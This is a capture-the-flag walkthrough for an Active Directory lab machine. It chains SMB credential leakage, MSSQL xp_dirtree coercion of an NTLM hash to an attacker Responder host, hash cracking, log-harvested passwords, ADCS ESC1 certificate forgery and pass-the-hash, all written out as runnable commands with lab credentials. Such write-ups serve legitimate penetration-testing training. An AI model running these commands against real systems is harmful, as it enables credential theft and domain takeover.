Escape
Overview
Escape chains together a publicly accessible SMB share leaking credentials, MSSQL NTLM hash capture via Responder, a leaked password in SQL Server logs, and finally ADCS certificate abuse (ESC1) to forge a certificate as Administrator. A solid Active Directory path with real-world misconfiguration patterns.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.34.131 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.34.131Open ports include SMB (445), MSSQL (1433), WinRM (5985), and RDP (3389). The presence of MSSQL alongside SMB is the primary attack surface.
SMB - Guest Enumeration
Check accessible shares as an anonymous/guest user using NetExec:
nxc smb 10.129.34.131 -u anonymous -p "" --sharesA Public share is readable without authentication. Connect with impacket-smbclient to browse it:
Inside the share, a file contains a plaintext username and password:
Credentials found: PublicUser:GuestUserCantWrite1
Foothold
MSSQL - NTLM Hash Capture
Use the discovered credentials to connect to MSSQL:
impacket-mssqlclient PublicUser:[email protected]From within MSSQL, force an outbound authentication attempt to our machine using xp_dirtree or xp_fileexist. This coerces the MSSQL service account (sql_svc) to authenticate to our Responder listener, leaking its NTLMv2 hash.
Start Responder on tun0 before triggering the connection:
sudo responder -I tun0Then in the MSSQL session:
EXEC xp_dirtree '\\10.10.14.X\share', 1, 1Responder captures the NTLMv2 hash for sql_svc. Crack it offline with hashcat (mode 5600 = NTLMv2):
hashcat -a 0 -m 5600 sql_svc_hash /mnt/hgfs/I/data/rockyou.txtCracked credentials: sql_svc:REGGIE1234ronnie
WinRM Shell
With the cracked password, authenticate via Evil-WinRM:
evil-winrm-py -i 10.129.34.131 -u sql_svc -p REGGIE1234ronniePrivilege Escalation
Credential Discovery in SQL Server Logs
Enumerate domain users from WinRM:
Browse C:\SQLServer\Logs - SQL Server logs capture failed login attempts, including cases where a user accidentally typed their password into the username field:
A cleartext password for Ryan.Cooper is visible in the log. Test it:
evil-winrm-py -i 10.129.34.131 -u Ryan.Cooper -p NuclearMosquito3It works.
Interesting Privilege
Ryan has SeMachineAccountPrivilege - the ability to add computer accounts to the domain. This becomes relevant for ADCS attacks that require a machine account.
ADCS - ESC1 (Vulnerable Certificate Template)
Enumerate ADCS templates for misconfigurations using certipy-ad:
certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -dc-ip 10.129.102.161 -enabled -vulnerableThe UserAuthentication template is vulnerable to ESC1 - it allows the requester to specify an arbitrary Subject Alternative Name (SAN), meaning we can request a certificate that authenticates as any user including Administrator.
Request a Certificate as Administrator
certipy-ad req -ca 'sequel-DC-CA' -u 'Ryan.Cooper' -p NuclearMosquito3 \
-dc-ip 10.129.102.161 -template 'UserAuthentication' \
-upn '[email protected]' -target 'dc.sequel.htb'Authenticate with the Certificate
certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.102.161Clock Skew Error: Kerberos requires clock synchronisation within 5 minutes. If you get a KRB_AP_ERR_SKEW error:
Fix it by disabling NTP and syncing to the DC:
timedatectl set-ntp false
rdate -n 10.129.34.131Certipy-ad returns the Administrator's NTLM hash. Pass-the-Hash via Evil-WinRM:
evil-winrm-py -i 10.129.34.131 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4eeAttack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMB guest enumeration | PublicUser:GuestUserCantWrite1 |
| Hash capture | MSSQL xp_dirtree → Responder | sql_svc NTLMv2 hash |
| Credential access | hashcat | sql_svc:REGGIE1234ronnie |
| Foothold | Evil-WinRM as sql_svc | Initial shell |
| Credential discovery | SQL Server log review | Ryan.Cooper:NuclearMosquito3 |
| Privesc | ADCS ESC1 cert → Administrator hash | Administrator NTLM |
| Root | Evil-WinRM PtH | Root flag |